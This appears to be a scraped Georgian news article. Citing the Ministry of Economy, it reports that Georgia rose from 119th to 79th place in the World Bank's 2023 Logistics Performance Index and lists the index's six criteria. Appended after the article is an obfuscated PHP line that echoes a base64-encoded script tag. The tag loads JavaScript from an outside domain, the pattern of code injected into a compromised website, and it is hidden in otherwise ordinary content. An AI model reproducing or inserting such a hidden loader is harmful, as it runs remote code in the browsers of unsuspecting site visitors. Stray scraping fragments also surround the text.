celsiusi
ავერსი შნაიდერი

საქართველოს ეკონომიკის სამინისტროს ინფორმაციით, მსოფლიო ბანკის მიერ გამოქვეყნებულ ლოგისტიკის ინდექსში (Logistics Performance Index-LPI) საქართველოს პოზიცია 40 საფეხურით გაუმჯობესდა.

როგორც უწყებაში აცხადებენ, ლოგისტიკის ინდექსის გაუმჯობესება ცხადყოფს საქართველოს სატრანზიტო-ლოგისტიკური როლის გაძლიერებას საერთაშორისო ვაჭრობასა და სატვირთო გადაზიდვების სფეროში.

„2023 წლის ინდექსში ჩვენმა ქვეყანამ 119-ე ადგილიდან 79-ე ადგილზე გადაინაცვლა. აღნიშნული ინდექსი 2018 წლის შემდეგ პანდემიის გამო არ გამოქვეყნებულა. ლოგისტიკის ინდექსის 2023 წლის მონაცემებით, საქართველოს აქვს 2.7 ქულა.

Logistics Performance Index (LPI) ინდექსის გაუმჯობესება ცხადყოფს საქართველოს სატრანზიტო-ლოგისტიკური როლის გაძლიერებას საერთაშორისო ვაჭრობასა და სატვირთო გადაზიდვების სფეროში.

ლოგისტიკის ინდექსი მსოფლიო ბანკმა შეიმუშავა, რათა დაეხმაროს ქვეყნებს, გამოავლინონ გამოწვევები და შესაძლებლობები საერთაშორისო სავაჭრო ლოგისტიკის სფეროში. ინდექსი სავაჭრო პარტნიორი ქვეყნების ლოგისტიკური ბაზრის მონაწილეების გამოკითხვის მიხედვითაა შედგენილი. შეფასება ხდება ექვს სხვადასხვა კრიტერიუმით. მათ შორისაა, საბაჟო – საზღვრის კვეთის პროცედურების ეფექტიანობა; ლოგისტიკასთან და ტრანსპორტთან დაკავშირებული ინფრასტრუქტურის ეფექტურობა; კონკურენტუნარიანი ფასების მქონე საერთაშორისო სატრანსპორტო გადაზიდვების ორგანიზების სიმარტივე; ლოგისტიკური მომსახურების ხარისხი და კომპეტენცია; გადაზიდვის მიკვლევადობისა და თვალყურის დევნების შესაძლებლობა და დაგეგმილ დროში ტვირთის დროულად მიწოდების მაჩვენებელი“, – აღნიშნულია ეკონომიკის სამინისტროს ინფორმაციაში. 

278
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");